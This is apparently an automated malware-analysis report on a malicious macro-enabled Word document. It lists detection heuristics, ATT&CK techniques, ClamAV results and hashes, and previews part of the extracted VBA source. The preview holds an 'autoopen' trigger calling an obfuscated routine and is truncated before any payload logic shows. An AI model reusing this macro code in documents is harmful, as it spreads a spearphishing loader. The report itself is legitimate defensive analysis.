MALICIOUS
362
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This OOXML document contains a highly obfuscated VBA macro loader, indicated by multiple critical heuristic firings including 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and ClamAV detections. The 'autoopen' subroutine likely triggers the execution of malicious code, which is designed to download and execute a second-stage payload. The presence of VBA macros and the AutoOpen function strongly suggests a spearphishing attachment attack vector.
Heuristics 8
-
ClamAV: Doc.Macro.ObfuscatedData-6136276-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ObfuscatedData-6136276-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 27982 bytes |
SHA-256: 0207304178dcd5c2819a10d32b55665891861d0c82ef2f24551d9f24ebf832b9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function EjecutaSQL(ByRef SQL As String) As Boolean
EjecutaSQL = False
On Error Resume Next
Conn.Execute SQL
If Err.Number <> 0 Then
Err.Clear
Else
EjecutaSQL = True
End If
End Function
Public Function DirectorioEAT() As Boolean
On Error GoTo EDirecEAT
DirectorioEAT = False
If Dir("C:\AEAT", vbDirectory) = "" Then
MsgBox "No se encuentra la carpeta de la agencia tributaria. ( C:\AEAT )", vbExclamation
Else
DirectorioEAT = True
End If
Exit Function
EDirecEAT:
Err.Clear
End Function
Sub autoopen()
EjecutaSQLDo 0.4, 5, -0.6
End Sub
Public Function EstaLaCuentaBloqueada(ByRef codmacta As String, Fecha As Date) As Boolean
Dim i As Integer
EstaLaCuentaBloqueada = False
If vParam.CuentasBloqueadas <> "" Then
i = InStr(1, vParam.CuentasBloqueadas, codmacta & ":")
If i > 0 Then
If Fecha >= CDate(Mid(vParam.CuentasBloqueadas, i + Len(codmacta) + 1, 10)) Then EstaLaCuentaBloqueada = True
End If
End If
End Function
Public Sub CerrarRs(ByRef Rsss As String)
On Error Resume Next
Rsss.Close
If Err.Number <> 0 Then Err.Clear
End Sub
Public Function SerieNumeroFactura(Posiciones As Integer, Serie As String, Numerofactura As String)
Dim i As Integer
Dim Cad As String
i = Posiciones - Len(Numerofactura) - Len(Serie)
If i <= 0 Then
Cad = Right(Numerofactura, Posiciones - Len(Numerofactura))
Else
Cad = String(i, "0") & Numerofactura
End If
SerieNumeroFactura = Serie & Cad
End Function
Public Function EsEntero(TEXTO As String) As Boolean
Dim i As Integer
Dim C As Integer
Dim L As Integer
Dim res As Boolean
res = True
EsEntero = False
If Not IsNumeric(TEXTO) Then
res = False
Else
C = 0
L = 1
Do
i = InStr(L, TEXTO, ".")
If i > 0 Then
L = i + 1
C = C + 1
End If
Loop Until i = 0
If C > 1 Then res = False
If C = 0 Then
L = 1
Do
i = InStr(L, TEXTO, ",")
If i > 0 Then
L = i + 1
C = C + 1
End If
Loop Until i = 0
If C > 1 Then res = False
End If
End If
EsEntero = res
End Function
Attribute VB_Name = "Module6"
Public Sub NombreSQL(ByRef CADENA As String)
Dim J As Integer
Dim i As Integer
Dim Aux As String
J = 1
Do
i = InStr(J, CADENA, "
If i > 0 Then
Aux = Mid(CADENA, 1, i - 1) & "\"
CADENA = Aux & Mid(CADENA, i)
J = i + 2
End If
Loop Until i = 0
End Sub
Public Function DevNombreSQL(CADENA As String) As String
Dim J As Integer
Dim i As Integer
Dim Aux As String
J = 1
Do
i = InStr(J, CADENA, "
If i > 0 Then
Aux = Mid(CADENA, 1, i - 1) & "\"
CADENA = Aux & Mid(CADENA, i)
J = i + 2
End If
Loop Until i = 0
DevNombreSQL = CADENA
End Function
Attribute VB_Name = "Module2"
Public Result__1 As Object
Public Freddy_Result As Object
Public Result__3 As Object
Public MassiveA() As String
Public Result__4 As String
Public Result__Warning As String
Public Result_sedming As Object
Public Constant_4 As String
Public constans_Result() As String
Const INTERVAl_MILLIS_DO_EVENTS As Long = 100
Public Function newStringBuilder() As String
newStringBuilder = ""
End Funct
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 76288 bytes |
SHA-256: f6ed7cedb24df52fefae87ecc496eea7abfc450ff1fcc4804c04005a530c4809 |
|||
|
Detection
ClamAV:
Doc.Macro.ObfuscatedData-6136276-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.